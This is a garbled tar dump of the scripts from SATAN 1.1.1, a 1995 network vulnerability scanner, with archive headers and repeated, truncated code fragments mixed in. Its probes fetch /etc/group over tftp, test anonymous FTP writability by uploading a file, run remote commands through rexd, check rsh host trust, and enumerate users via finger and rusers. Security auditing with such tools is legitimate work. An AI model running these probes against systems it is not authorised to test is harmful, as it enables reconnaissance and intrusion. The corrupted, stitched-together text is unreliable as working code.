..shift(@ARGV); . } .} } $errs == 0; } 1; defined. # There's no portable way to find the system default timsatan-1.1.1/perllib/README.......................................................................... 600 . 465 . 506 . 225 5742457361 10176. ......................................... ................................................................................................................................................................................................................................................................. ..........................................................These files were taken from the perl5.000 release. They are bundled with SATAN for your convenience; many perl5 installations seem to be incomplete. # side effect. sub Getopts { local($argumentative) = @_; local(@args,$_,$first,$rest); local($errs) = 0; local($[) = 0; @args = split( / */, $argumentative ); while(@ARGV && ($_ = $ARGV[0]) =~ /^-(.)(.*)/) { .($first,$rest) = ($1,$2); .$pos = index($argumentative,$first); .if($pos >= $[) { . if($args[$pos+1] eq ':') { ..shift(@ARGVsatan-1.1.1/bin/.................................................................................... 700 . 465 . 506 . 0 5742521536 6363. ........................................................................................ ................................................................................................................................................................................................................................................................. ...........satan-1.1.1/bin/boot.satan.......................................................................... 700 . 465 . 506 . 2144 5742457416 10454. .......................................................................................... ................................................................................................................................................................................................................................................................. .........#!/usr/local/bin/perl5 # # Execute a bootparam WHOAMI request and report the results. # $running_under_satan = 1; require 'config/paths.pl'; require 'perl/misc.pl'; require 'perl/fix_hostname.pl'; die "usage: $0 client server" unless ($#ARGV == 1); $target = $client = $ARGV[0]; $server = $ARGV[1]; # fields for satan... $severity="x"; $status="a"; $service = "boot"; open(BOOT, "$BOOT $client $server|"); while (<BOOT>) { .chop; .if (/domain_name:\s+(\S+)/) { ..$service_output = "domain $1"; ..$target = $server; &satan_print; ..$target = $client; &satan_print; .} .if (/client_name:\s+(\S+)/) { ..$client = &fix_hostname($1, $server); ..$service_output = "client $client"; ..$target = $client; &satan_print; .} .if (/router_addr:\s+(\S+)/) { ..$service_output = "router $1"; ..$target = $client; &satan_print; .} } close(BOOT); # print something out if nothing has happened so far... # if rpcinfo returns !0, then flag it; else, nothing interesting showed up. if ($service_output eq "") { .$severity=""; .if ($?) { ..$text="boot error #$?"; .} else { ..$text="No boot output of interest"; .} .&satan_print(); } rst = \$rest;"; . } . else { ..eval "\$opt_$first = 1"; ..if($rest eq '') { .. shift(@ARGV); ..} ..else { .. $ARGV[0] = "-$rest"; ..} . } .} .else { . print STDERR "Unknown option: $first\n"; . ++$errs; . if($rest ne '') { ..$ARGV[0] = "-$rest"; . } . else { ..shift(@ARGV); . } .} } $errs == 0; } 1; defined. # There's no portable way to find the system default timsatan-1.1.1/bin/dns.satan........................................................................... 700 . 465 . 506 . 5012 5742457416 10272. ......................................... ................................................................................................................................................................................................................................................................. ..........................................................#!/usr/local/bin/perl5 # # information gatherer for dns -- uses NSLOOKUP, so you're hosed # unless you have that... # # XXX Must look for address->name servers too. # $running_under_satan = 1; require 'config/paths.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; # $usage="Usage: $0 target\n"; &Getopts("v"); if ($#ARGV < 0) { .print STDERR $usage; .exit 1; .} $target = $ARGV[0]; $service = &basename($0, ".satan"); $status = "a"; # open up NSLOOKUP die "Can't run $NSLOOKUP\n" unless open(NS, "$NSLOOKUP <<EOC set qt=any $target. EOC |"); # until we change this, query away... $done = 0; while (<NS>) { .next if ($_ =~ />/); .chop; .# pick up any tidbits along the way... .&get_misc_dns_info(); .# ok, lets get the places we can get authoritative answers... .if ($_ =~ /Authoritative answers/) { while (<NS>) { ..last if ($_ =~ />/); ..chop; ..&get_misc_dns_info(); ..($auth, $garbage) = split; ..$all_auth{"\L$auth\E"} = "\L$auth\E"; ..} ..} .} $trustee = ""; $trusted = ""; $severity = ""; $target_orig = $target; for $cpu (keys %cpu) { .$service_output = $cpu{$cpu}; .$target = $cpu; .$text = "HINFO output"; .&satan_print(); .} for $os (keys %os) { .$service_output = $os{$os}; .$target = $os; .$text = "HINFO output"; .&satan_print(); .} for $ma (keys %ma) { .$ma{$ma} =~ s/^([^\.]+)\.(.+)$/$1\@$2/; .$severity = "x"; .$target = $ma; .$service_output = $ma{$ma}; .$trusted = $ma;. .$text = "Mail address for DNS contact"; .&satan_print(); .} for $me (keys %me) { .$severity = "x"; .$target = $target_orig; .# do we want the number here? .# $service_output = "$me $me{$me}"; .$service_output = $me; .$trusted = $me;. .$text = "Mail exchanger"; .&satan_print(); .} # pursue this? # # print "\nauth-answers from:\n" if (defined(%all_auth)); #.for $au (values %all_auth) { #..print "$au\n"; #..} # print "\nnameservers:\n" if (defined(%ns)); $trustee = "$target"; for $ns (values %ns) { .$severity = "host"; .$target = $target_orig; .$trusted = $ns; .$service_output = ""; .$text = "authoritative DNS host"; .&satan_print(); .} # # suck in various stuff we can get from the records -- mail exchanger, cpu, etc. # sub get_misc_dns_info { if ($_ =~ /nameserver =/) { ($ns) = /nameserver = (\S+)/; $ns{$ns}="\L$ns\E"; } if ($_ =~ /CPU\s*=/) { ($cpu{$target}) = /CPU\s*=\s*(\S+)/; } if ($_ =~ /OS\s*=/) { ($os{$target}) = /OS\s*=\s*(\S+)/; } if ($_ =~ /mail exchanger/) { .($pref, $me) = /preference = (\S+).*mail exchanger = (\S+)/; .$pref =~ s/,//; .$me{$me} = $pref; .} if ($_ =~ /mail addr/) { ($ma{$target}) = /mail addr = (\S+)/; } } al/bin/perl5 # # information gatherer for dns -- uses NSLOOKUP, so you're hosed # unless you have that... # # XXX Must look for address->name servers too. # $running_under_satan = 1; require 'config/paths.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; # $usage="Usage: $0 target\n"; &Getopts("v"); if ($#ARGV < 0) { .print STDERR $usage; .exit 1; .} $target = $ARGV[0]; $service = &basename($0, ".satan"); $status = "a"; # open up NSLOOKUP die "Can't run $NSLOOKUP\n" unless open(NS,satan-1.1.1/bin/finger.satan........................................................................ 700 . 465 . 506 . 4434 5742457416 10767. .......................................................... ................................................................................................................................................................................................................................................................. .........................................#!/usr/local/bin/perl5 # # version 2, Mon Mar 20 21:30:24 1995, last mod by wietse # # Query the target's finger daemon and report which user logged in from # which host. Try to clean up unqualified host names or host names that # may be truncated. $running_under_satan = 1; require 'config/paths.pl'; require 'perl/fix_hostname.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; # # Parse JCL. # $usage="Usage: $0 [-u user] [user@]target\n"; $opt_u = ":0:\@:root:demo:guest"; &Getopts("u:v"); if ($#ARGV < 0) { print STDERR $usage; exit 1; } # If no user is given, iterate over a list of queries that might # give us some interesting answers. if ($ARGV[0] =~ /([^@]+)@([^@]+)/) { $login = $1; $target = $2; } else { $target = $ARGV[0]; $login = $opt_u; } $| = 1; $service = &basename($0, ".satan"); $severity = "l"; foreach $user (split(/:/, $login)) { print "trying: $SAFE_FINGER -l $user\@$target\n" if $opt_v; open (FINGER, "$SAFE_FINGER -l $user\@$target 2>/dev/null|") .|| exit 1; while (<FINGER>) { .print if $opt_v; .if (/^ login name: (\S+)/i) { . $user = $1; .} .if (/^ login: (\S+)/i) { . $user = $1; .} .if (/^ directory: (\S+)/i) { . $home = $1; .} .if (/(on since|last login).*\s+from\s+(\S+)/i) { . # Get rid of sync, daemon, localhost, X displays . next if ($user eq "sync" || $user eq "daemon"); . $origin = $2; . $origin =~ s/:.*//; . # Strip off X display numbers. . if ($origin =~ /(.*)@(.*)/) { ..($ruser = $1) || ($ruser = "root"); ..$host = $2; . } else { ..$ruser = "root"; ..$host = $origin; . } . next if ($host eq "" || $host eq "localhost"); . if ($fqdn = &fix_hostname($host, $target)) { ..$host = $fqdn; ..$status = "a"; ..$trustee = "$user\@$target"; ..$trusted = "$ruser\@$host"; ..$text = "login $user home $home from $host" . } else { ..$status = "u"; ..$trustee = "$user\@$target"; ..$trusted = "$user\@$host"; ..$text = "login $user home $home from $host, unable to verify hostname"; . } . $service_output = "$user $home $host"; . &satan_print(); .} elsif (/^ (never logged in|on since|last login)/i) { . $status = "a"; . $trustee = $trusted = ""; . $text = "login $user home $home"; . $service_output = "$user $home"; . &satan_print(); .} } close(FINGER); } ($os{$target}) = /OS\s*=\s*(\S+)/; } if ($_ =~ /mail exchanger/) { .($pref, $me) = /preference = (\S+).*mail exchanger = (\S+)/; .$pref =~ s/,//; .$me{$me} = $pref; .} if ($_ =~ /mail addr/) { ($ma{$target}) = /mail addr = (\Ssatan-1.1.1/bin/ftp.satan........................................................................... 700 . 465 . 506 . 2556 5742457416 10311. ........................................... ................................................................................................................................................................................................................................................................. ........................................................#!/usr/local/bin/perl5 # See if the target provides anonymous ftp, non-intrusive. require 'config/paths.pl'; require 'config/satan.cf'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; $usage="Usage: $0 [-v] target"; &Getopts("v") || die $usage; ($#ARGV == 0) || die $usage; $target = $ARGV[0]; $service = &basename($0, ".satan"); open(FTP, "$FTP -nv <<EOF open $target quote user anonymous quote pass -satan\@ cd / put /etc/group $$.foo dele $$.foo quit EOF |") || die "cannot run $FTP"; while(<FTP>) { if (defined($opt_v)) { .print; } if (/^230/) { .$status = "a"; .$severity = "x"; .$trustee = ""; .$trusted = ""; .$service_output = "ANONYMOUS"; .$text = "offers anon ftp"; .$texts{&satan_string()} = 1; } elsif (/^226/) { .$severity = "nw"; .$trustee = "~ftp@$target"; .$trusted = "ANY\@ANY"; .$service_output = "writable FTP home directory"; .$text = "~ftp is writable"; .$texts{&satan_string()} = 1; } elsif (/^553/) { .$severity = ""; .$trustee = ""; .$trusted = ""; .$service_output = ""; .$text = "~ftp is not writable"; .$texts{&satan_string()} = 1; } elsif (/^530/) { .$status = "a"; $severity = ""; $trustee = ""; $trusted = ""; $service_output = ""; .$text = "offers no anon ftp"; .$texts{&satan_string()} = 1; } elsif (/^Not connected/) { .exit 1; } } foreach $key (keys %texts) { print "$key\n"; } . $origin = $2; . $origin =~ s/:.*//; . # Strip off X display numbers. . if ($origin =~ /(.*)@(.*)/) { ..($ruser = $1) || ($ruser = "rsatan-1.1.1/bin/nfs-chk.satan....................................................................... 700 . 465 . 506 . 3353 5742457416 11045. ...................................................................... ................................................................................................................................................................................................................................................................. .............................#!/usr/local/bin/perl5 # # Report file systems that are exported via portmap or that can be mounted # by unpriviliged programs. World-mountable file systems are already taken # care of by showmount.satan. # # version 1, Mon Mar 20 18:48:11 1995, last mod by wietse # $running_under_satan = 1; require 'config/satan.cf'; require 'config/paths.pl'; require 'perl/misc.pl'; require 'perl/hostname.pl'; require 'perl/getfqdn.pl'; require 'perllib/getopts.pl'; $usage="Usage: $0 [-t timeout -u -v] target"; $opt_u = $untrusted_host; &Getopts("t:uv") || die $usage; $timeout = $short_timeout; ($#ARGV == 0) || die $usage; $target = $ARGV[0]; $flags = "-v" if defined($opt_v); $timeout = $opt_t if defined($opt_t); $untrusted_host = $opt_u; $flags = "$flags -t $timeout" if defined($opt_t); $service = &basename($0, ".satan"); $severity = "x"; $status = "a"; $service_output = ""; $| = 1; open(NFS, "$NFS_CHK $flags $target |") || die "$0: cannot run nfs-chk"; while(<NFS>) { .if (defined($opt_v)) { . print; .} .if (/exports (\S+) via portmapper/) { ..$trusted = "ANY\@ANY"; ..$trustee = "$1\@$target"; ..$service_output = "NFS export via portmapper"; ..$text = "exports $1 via portmapper"; ..&satan_print(); .} elsif ($untrusted_host && /Mounted: (\S+) via mount daemon/) { ..$trusted = "ANY\@ANY"; ..$trustee = "$1\@$target"; ..$service_output = "unrestricted NFS export"; ..$text = "exports $1 to everyone"; ..&satan_print(); .} elsif (/exports (\S+) to unprivileged/) { ..$this_host = &getfqdn(&hostname()); ..$trusted = "ANY\@$this_host"; ..$trustee = "$1\@$target"; ..$service_output = "NFS export to unprivileged programs"; ..$text = "exports $1 to unprivileged programs"; ..&satan_print(); .} .# world-wide exports already taken care of in showmount.satan } \@$target"; ..$trusted = "$ruser\@$host"; ..$text = "login $user home $home from $host" . } else { ..$status = "u"; ..$trustee = "$user\@$target"; ..$trusted = "$user\@$host"; ..$text = "login $user home $home from $host, unable to verify hostname"; . } . $service_outsatan-1.1.1/bin/rex.satan........................................................................... 700 . 465 . 506 . 1573 5742457416 10314. .................................................................................... ................................................................................................................................................................................................................................................................. ...............#!/bin/sh # # If the host permits on/rexd with default auth_unix authentication, # get the message of the day to prove we were in. . config/paths.sh # used in final output target=$1 service=`$BASENAME $0 | $SED 's/\..*$//'` status="a" tmp_file=/tmp/rex.$$ trap "$RM -f $tmp_file; exit" 0 1 2 3 15 case $# in 1) target=$1;; *) $ECHO Usage: $0 target 1>&2; exit 1;; esac # need the C program/exe to do the real work: if $TEST ! -f "$REX" ; then .exit 1 .fi $REX -a 1,1,1 $target date >$tmp_file 2>/dev/null if $TEST -s $tmp_file ; then .severity="us" .trustee="USER@$target" .trusted="ANY@ANY" .service_output="REXD access" .text="rexd is vulnerable to the world" else .severity="" .trustee="" .trusted="" .service_output="" .text="rexd isn't vulnerable" .fi $RM -f $tmp_file $ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text" # that's it... pen(NFS, "$NFS_CHK $flags $target |") || die "$0: cannot run nfs-chk"; while(<NFS>) { .if (defined($opt_v)) { . print; .} .if (/exsatan-1.1.1/bin/rpc.satan........................................................................... 700 . 465 . 506 . 4224 5742457416 10276. ............................................................................................. ................................................................................................................................................................................................................................................................. ......#!/usr/local/bin/perl5 # # Does an "rpcinfo -p" on a machine, tries to determine anything interesting # running there. # # TODO -- verify args # # version 1, Mon Mar 20 21:05:44 1995, last mod by wietse # require 'config/paths.pl'; require 'perl/misc.pl'; die "usage: $0 target" unless ($#ARGV == 0); # fields for satan... $severity="x"; $status="a"; $target = $ARGV[0]; open(RPC, "$RPCINFO -p $target|"); while (<RPC>) { .chop; .($prog, $vers, $proto, $port, $name) = split; .if ($name eq "rexd" || $prog == 100017)..{ $rexd = 1; } .if ($name eq "arm")....{ $arm = 1; } .if ($name eq "bootparam" || $prog == 100026).{ $bootparamd = 1; } .if ($name eq "ypserv" || $prog == 100004).{ $ypserv = 1; } .if ($name eq "ypbind" || $prog == 100007).{ $ypbind = 1; } .if ($name eq "selection_svc" || $prog == 100015){ $s_svc = 1; } .if ($name eq "nfs" || $prog == 100003)..{ $nfs = 1; } .if ($name eq "mountd" || $prog == 100005).{ $mountd = 1; } .if ($name eq "rusersd" || $prog == 100002).{ $rusersd = 1; } .if ($name eq "netinfobind" || $prog == 200100001){ $netinfobind = 1; } .if ($name eq "admind" || $prog == 100087).{ $admind = 1; } } close(RPC); if ($rexd) { .$service = "rexd"; $text = "runs rexd"; &satan_print; } if ($arm) { .$service = "arm"; $text = "runs arm"; &satan_print; } if ($bootparamd) { .$service = "bootparam"; $text = "runs bootparam"; &satan_print; } if ($ypserv) { .$service = "ypserv"; $text = "is a NIS server"; &satan_print; } if ($ypbind) { .$service = "ypbind"; $text = "is a NIS client"; &satan_print; } if ($rusersd) { .$service = "rusersd"; $text = "runs rusersd"; &satan_print; } if ($nfs) { .$service = "nfs"; $text = "runs NFS"; &satan_print; } if ($mountd) { .$service = "mountd"; $text = "runs NFS"; &satan_print; } if ($s_svc) { .$service = "selection_svc"; $text = "runs selection_svc"; &satan_print; } if ($admind) { .$service = "admind"; $text = "runs admind"; &satan_print; } # print something out if nothing has happened so far... # if rpcinfo returns !0, then flag it; else, nothing interesting showed up. if ($text eq "") { .$severity=""; .if ($?) { $text="rpcinfo error #$?"; } .else { $text="No rpcinfo output of interest"; } .&satan_print(); } version 1, Mon Mar 20 21:05:44 1995, last mod by wietse # require 'config/paths.pl'; require 'perl/misc.pl'; die "usage: $0 target" unless ($#ARGV == 0); # fields for satan... $severity="x"; $status="a"; $target = $ARGV[0]; open(RPC, "$RPCINFO -p $target|"); while (<RPC>) { .chop; .($prog, $vers, $proto, $port, $name) = split; .if ($name eq "rexd" || $progsatan-1.1.1/bin/rsh.satan........................................................................... 744 . 465 . 506 . 3053 5742457416 10315. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................#!/bin/sh # # Does host trust us? What is in hosts.equiv (probably a "+", if # this works...) Should run as "root" # # CHANGES TO BE DONE: do something with the output. # # # version 2, Sat Apr 8 21:02:49 1995, last mod by wietse # . config/paths.sh user=bin tmp_file="./tmp_file.$$" # arg stuff: while $TEST $# != 0 do case "$1" in -u) user=$2 ; shift ;; *) target=$1 esac shift done if $TEST "X$target" = "X" ; then $ECHO Usage $0 [-u user] target exit 1 fi # used in final output # target=$1 service=`$BASENAME $0 | $SED 's/\..*$//'` status="a" service_output="" # Check to see if we are who we should be -- bin or whatever: whoami=`$WHOAMI` if $TEST "$whoami" = "root" ; then .$RCMD $target $user "file /bin/sh" > $tmp_file 2> /dev/null else .# $ECHO Must be run as root .exit 2 .fi if $GREP /bin/sh "$tmp_file" >/dev/null ; then .# do we want to put the output into a data file? .# $ECHO $target /etc/hosts.equiv file: `$CAT $tmp_file` .trustee="USER@$target" .service_output="remote shell access" .if $TEST $user = "bin" ; then ..trusted="ANY@ANY" ..text="rshd trusts the world" ..# assume if you can get bin, a "+" in hosts.equiv, == root .severity="rs" .else ..trusted="$user@ANY" ..text="user $user trusts the world" .severity="us" ..fi else .severity="" .trustee="" .trusted="" .service_output="" .text="doesn't trust the world" .fi $ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text" $RM -f $tmp_file exit 0 # finis xt = "runs rusersd"; &satan_print; } if ($nfs) { .$service = "nfs"; $text = "runs NFS"; &satan_print; } if ($mountd) { .$service = "mountd"; $text = "runs NFS"; &satan_print; } if ($s_svc) { .$service = "selection_svc"; $text = "runs selection_svc"; &satan_print; } if ($admind) { .$service = "admind"; $text = "runs admind"; &satan_print; } # print something out if nothing has happened so far... # if rpcinfo returns !0, then flag it; else, nothing interesting showesatan-1.1.1/bin/rusers.satan........................................................................ 700 . 465 . 506 . 3367 5742457416 11044. ............................... ................................................................................................................................................................................................................................................................. ....................................................................#!/usr/local/bin/perl5 # # version 1, Mon Mar 20 18:49:25 1995, last mod by wietse # # Query the target's rusers daemon and report which user logged in from # which host. Try to clean up unqualified host names or host names that # are truncated. $running_under_satan = 1; require 'config/paths.pl'; require 'perl/fix_hostname.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; # # Parse JCL. # $usage="Usage: rusers.satan target\n"; &Getopts("v"); if ($#ARGV < 0) { .print STDERR $usage; .exit 1; } $target = $ARGV[0]; $service = &basename($0, ".satan"); $| = 1; # # Examine the output from the rusers client. # open (RUSERS, "$RUSERS -l $target 2>/dev/null|") || exit 1; while (<RUSERS>) { ($user, $where, $month, $day, $time, $idle, $host) = split; # Deal with hostname stuff in case of remote logins. if (/$.*$/) { .if ($idle && !$host) { . $host = $idle; .} .# Get rid of X display numbers. .$host =~ s/:.*//; .$host =~ s/[()]//g; .# Verify hostname if anything interesting was left. .if ($host ne "" && $host ne "localhost") { . # Canonicalize the host name. . if ($fqdn = &fix_hostname($host, $target)) { ..$host = $fqdn; ..$status = "a"; ..$severity = "l"; ..$trustee = "$user\@$target"; ..$trusted = "root\@$host"; ..$service_output = "$user"; ..$text = "login $user from $host"; ..&satan_print(); . } else { ..$status = "u"; ..$severity = "l"; ..$trustee = "$user\@$target"; ..$trusted = "root\@$host"; ..$service_output = "$user"; ..$text = "login $user from $host, unable to verify hostname"; ..&satan_print(); . } .} } # Log this user, whether or not remote. $status = "a"; $severity = "l"; $text = "login $user"; $service_output = "$user"; $trusted = $trustee = ""; &satan_print(); } else ..trusted="$user@ANY" ..text="user $user trusts the world" .severity="us" ..fi else .severity="" .trustee="" .trusted="" .service_output="" .text="doesn't trust the world" .fi $ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_outputsatan-1.1.1/bin/showmount.satan..................................................................... 700 . 465 . 506 . 5103 5742457416 11552. .......................... ................................................................................................................................................................................................................................................................. .........................................................................#!/usr/local/bin/perl5 # # Find out some stuff about NFS using showmount: world-wide exports, # boot clients. Should not bother to do this when rpc.rip fails. # # require these packages: $running_under_satan = 1; require "config/paths.pl"; require "perl/misc.pl"; require "perl/fix_hostname.pl"; if ($#ARGV != 0) { print "Usage $0 target\n"; exit(1); } $target = $ARGV[0]; ($service = $0) =~ s@^.*/([^\/\.]*)\..*$@$1@; # # we don't make value judgements here # $severity = "x"; $service_output = ""; # Showmount -e tells us who can mount what from this server. open(SM, "$SHOWMOUNT -e $target|"); while (<SM>) { .chop; .next unless /^(\S+)\s+(\S+)\s*$/; .$files = $1; .@hosts = split(",", $2); .for $host (@hosts) { ..$Host = $host; ..$host =~ tr/A-Z/a-z/; ..if ($host eq "$everyone$" || $Host eq "Everyone") { ...next if $untrusted_host; ...$status="a"; ...$trustee="$files\@$target"; ...$trusted="root\@ANY"; ...$service_output="unrestricted NFS export"; ...$text="exports $files to everyone"; ...} ..else { ...$fqdn = &fix_hostname($host ,$target); ...# if the host doesn't really exist, it could ...# be a netgroup or something... try to complete ...# hostname if not FQDN, etc., then try to resolve. ...# If everything fails, just output what we can: ...if ($fqdn eq "") { ....$status="u"; ....$trustee="$files\@$target"; ....$trusted="root\@$host"; ....$service_output="$target $host"; ....$text="exports $files to $host, but we can't verify that $host exists"; ....} ...else { ....$host = $fqdn; ....$status="a"; ....$trustee="$files\@$target"; ....$trusted="root\@$host"; ....$service_output="$target $host"; ....$text="exports $files to $host"; ....} ...} ..&satan_print(); ..$print_flag = 1; ..} .} # Showmount -a tells what systems actually mount from this server. open(SM, "$SHOWMOUNT -a $target|"); while (<SM>) { .chop; .next unless /(\S+):(\S+)/; .($host = $1) =~ tr/A-Z/a-z/; .$path = $2; .$fqdn = &fix_hostname($host ,$target); .# If everything fails, just output what we can: .if ($fqdn eq "") { ..$status="u"; ..$trustee="$path\@$target"; ..$trusted="root\@$host"; ..$service_output="$target $host"; ..$text="$host mounts $path from $target, but we can't verify that $host exists"; .} else { ..$host = $fqdn; ..$status="a"; ..$trustee="$path\@$target"; ..$trusted="root\@$host"; ..$service_output="$target $host"; ..$text="$host mounts $path from $target"; .} .&satan_print(); .$print_flag = 1; } # print something out if nothing has happened so far... if (!$print_flag) { .$status="a"; .$severity=""; .$text="Not running showmount or other error"; .&satan_print(); } this server. open(SM, "$SHOWMOUNT -e $target|"); while (<SM>) { .chop; .next unless /^(\S+)\s+(\S+)\s*$/; .$files = $1; .@hosts = split(",", $2); .for $host (@hosts) { ..$Host = $host; ..$host =~ tr/A-Z/a-z/; ..if ($host eq "$everyone$" || $Host eq "Everyone") { ...next if $untrusted_host; ...$status="a"; ...$trustee="$files\@$target"; ...$trusted="root\@ANY"; ...$service_output="unrestricted NFS export"; ...$text="exports $files to evesatan-1.1.1/bin/tcpscan.satan....................................................................... 700 . 465 . 506 . 2320 5742457416 11140. ...................................................................... ................................................................................................................................................................................................................................................................. .............................#!/usr/local/bin/perl5 # # version 1, Mon Mar 20 18:44:32 1995, last mod by wietse # # # Report TCP services (banners where possible). # require 'config/paths.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; $usage = "usage $0 [-v] ports target"; &Getopts("v") || die $usage; die $usage unless ($#ARGV == 1); ($services = $ARGV[0]) =~ tr /,/ /; $target = $ARGV[1]; $severity = "x"; $status = "a"; $| = 1; open(SERVICES, $SERVICES) || die "$0: cannot open $SERVICES: $!\n"; while (<SERVICES>) { .$service_name{$2} = $1 if /(\S+)\s+([0-9]+)\/tcp/; } close(SERVICES); $command = "$TCP_SCAN -bs 'QUIT\\r\\n' $target $services"; print "$command\n" if $opt_v; open(TCP_SCAN, "$command|") .|| die "$0: cannot run $TCP_SCAN"; while(<TCP_SCAN>) { .if (defined($opt_v)) { . print; .} .chop; .s/^600([0-9]):[^:]*/600$1:X-$1/; .s/^60([1-9][0-9]):[^:]*/60$1:X-$1/; .($port, $service, $flag, $service_output) = split(/:/, $_, 4); .$service = $service_name{$port} if $service_name{$port}; .if ($flag =~ /t/ && $port != 23 && $service_output) { ..$service = "telnet on port $port"; .} elsif ($service eq "UNKNOWN") { ..$service = "$port:TCP"; .} .$service_output =~ y/|/?/; .$text = "offers $service"; .&satan_print(); } resolve. ...# If everything fails, just output what we can: ...if ($fqdn eq "") { ....$status="u"; ....$trustee="$files\@$target"; ....$trusted="root\@$host"; ....$service_output="$target $host"; ....$text="exports $files to $host, but we can't verify that $host exists"; ....} ...else { ....$host = $fqdsatan-1.1.1/bin/tftp.satan.......................................................................... 700 . 465 . 506 . 2414 5742457416 10466. ..................................................................................... ................................................................................................................................................................................................................................................................. ..............#!/bin/sh # # Usage: $0 target_host # # Quick (well, relative; quickly written code, not a quick test) tftp # checker. # # Connects to the host, tries to get the password file. Takes a long # time to timeout... # # # Location of stuff: . config/paths.sh # need a target, eh? if $TEST $# -ne "1" ; then .$ECHO Usage: $0 target_host .exit 1 .fi # used in final output target=$1 service=`$BASENAME $0 | $SED 's/\..*$//'` status="a" # tmp and target file file=/etc/group TMP=./tmp.$$ # # Do the dirty work -- check tftp for the localhost, if it was found; # this might take a bit, since tftp might have to time out. { $TFTP << _XXX_ connect $target get $file $TMP quit _XXX_ } > /dev/null 2> /dev/null if $TEST -s $TMP ; then .trustee="nobody@$target" .trusted="ANY@ANY" .service_output="TFTP file access" .text="tftp file read" .severity="nr" .$ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text" .# little trick; output it once, then again below, for both .# reading and writing. .text="tftp file write" .severity="nw" else .severity="" .trustee="" .trusted="" .service_output="" .text="tftp isn't running or is restricted" .fi $ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text" $RM -f $TMP exit 0 # end of script ) { . print; .} .chop; .s/^600([0-9]):[^:]*/600$1:X-$1/; .s/^60([1-9][0-9]):[^:]*/60$1:X-$1/; .($port, $service, $flag, $service_output) = split(/:/, $_, 4); .$service = $service_name{$port} if $service_name{$port}; .if ($flag =~ /t/ && $porsatan-1.1.1/bin/udpscan.satan....................................................................... 700 . 465 . 506 . 1710 5742457417 11145. ............................................................................ ................................................................................................................................................................................................................................................................. .......................#!/usr/local/bin/perl5 # # version 1, Mon Mar 20 18:46:18 1995, last mod by wietse # # # Report UDP services. # require 'config/paths.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; $usage = "usage $0 [-v] ports target"; &Getopts("v") || die $usage; die $usage unless ($#ARGV == 1); ($services = $ARGV[0]) =~ tr /,/ /; $target = $ARGV[1]; $severity = "x"; $status = "a"; $| = 1; open(SERVICES, $SERVICES) || die "$0: cannot open $SERVICES: $!\n"; while (<SERVICES>) { .$service_name{$2} = $1 if /(\S+)\s+([0-9]+)\/udp/; } $command = "$UDP_SCAN $target $services"; print "$command\n" if $opt_v; open(UDP_SCAN, "$command|") .|| die "$0: cannot run $UDP_SCAN"; while(<UDP_SCAN>) { .if (defined($opt_v)) { . print; .} .chop; .($port, $service) = split(/:/, $_); .$service = $service_name{$port} if $service_name{$port}; .if ($service eq "UNKNOWN") { $service = "$port:UDP"; } .$service_output = ""; .$text = "offers $service"; .&satan_print(); } port} if $service_name{$port}; .if ($flag =~ /t/ && $porsatan-1.1.1/bin/xhost.satan......................................................................... 700 . 465 . 506 . 1764 5742457417 10666. ............................................................................ ................................................................................................................................................................................................................................................................. .......................#!/usr/local/bin/perl5 # # Query the target's X display and report whether or not it is vulnerable # to simple X attacks (keystroke grabbing, etc.) # # require 'config/paths.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; $usage = "Usage: $0 [-d display] [-v] target"; &Getopts("d:v") || die $usage; ($#ARGV == 0) || die $usage; # used in final output $target = $ARGV[0]; $display = defined($opt_d) ? $opt_d : "$target:0"; $service = &basename($0, ".satan"); $status = "a"; # the actual program that does the work $command = "DISPLAY=$display $XHOST 2>/dev/null"; print "$command\n" if $opt_v; open (XHOST, "$command|") || die "cannot run $XHOST"; if (<XHOST> =~ /disabled/i) { .$severity = "us"; .$trustee = "USER\@$target"; .$trusted = "ANY\@ANY"; .$service_output = "unrestricted X server access"; .$text = "no X server access control"; } else { .$severity = ""; .$trustee = ""; .$trusted = ""; .$service_output = ""; .$text = "X server isn't vulnerable"; } &satan_print(); # that's it... /t/ && $porsatan-1.1.1/bin/ypbind.satan........................................................................ 700 . 465 . 506 . 3505 5742457417 11001. ......................................................................................... ................................................................................................................................................................................................................................................................. ..........#!/usr/local/bin/perl5 # Try to identify a host's NIS domain name and NIS server by trying out a # series of NIS domain name guesses. When the number of guesses becomes # sufficiently large (say, several tens when the network is fast) the # remote ypbind daemon may fall behind so far that it runs out of file # descriptors. This can be fixed by inserting sleep() calls. $running_under_satan = 1; require 'config/paths.pl'; require 'perl/fix_hostname.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'; # # Do JCL stuff. # $usage="Usage: $0 target [hints]\n"; &Getopts("d:v"); if ($#ARGV < 0) { print STDERR $usage; exit 1; } $target = $ARGV[0]; $service = &basename($0, ".satan"); $status = "a"; # Iterate over all hints. For each hint, try the hint itself, then all # results from breaking it up at successive dots. We use an associative # array to weed out duplicate guesses. # if ($opt_d) { $guesses{$opt_d} = 0; } else { foreach $i (1..$#ARGV, 0) { .$hint = $ARGV[$i]; .$guesses{$hint} = 0; .for ($dot = rindex($hint,"."); $dot >= $[; $dot = rindex($head,".")) { . $head = substr($hint, $[, $dot - $[); . $guesses{$head} = 0; . $tail = substr($hint, $dot + 1); . $guesses{$tail} = 0; .} } } foreach $guess (keys %guesses) { if (defined($opt_v)) { .print STDERR "ypbind.satan: trying: $guess\n"; } open (YPWHICH, "$YPWHICH -d $guess $target 2>/dev/null|") .|| exit 1; while (<YPWHICH>) { .chop; .$nis_server = &fix_hostname(&get_host_name($_), $target); .$severity = "x"; .$trusted = "root\@$nis_server"; .$trustee = "root\@$target"; .$service_output = "$guess $nis_server"; .$text = "$nis_server serves nis domain $guess for $target"; .&satan_print(); .exit; } close (YPWHICH); } # All out guesses failed. $text = "unable to guess nis domain name of $target"; &satan_print(); exit; >) { .chop; .next unless /(\S+):(\S+)/; .($host = $1) =~ tr/A-Z/a-z/; .$path = $2; .$fqdn = &fix_hostname($host 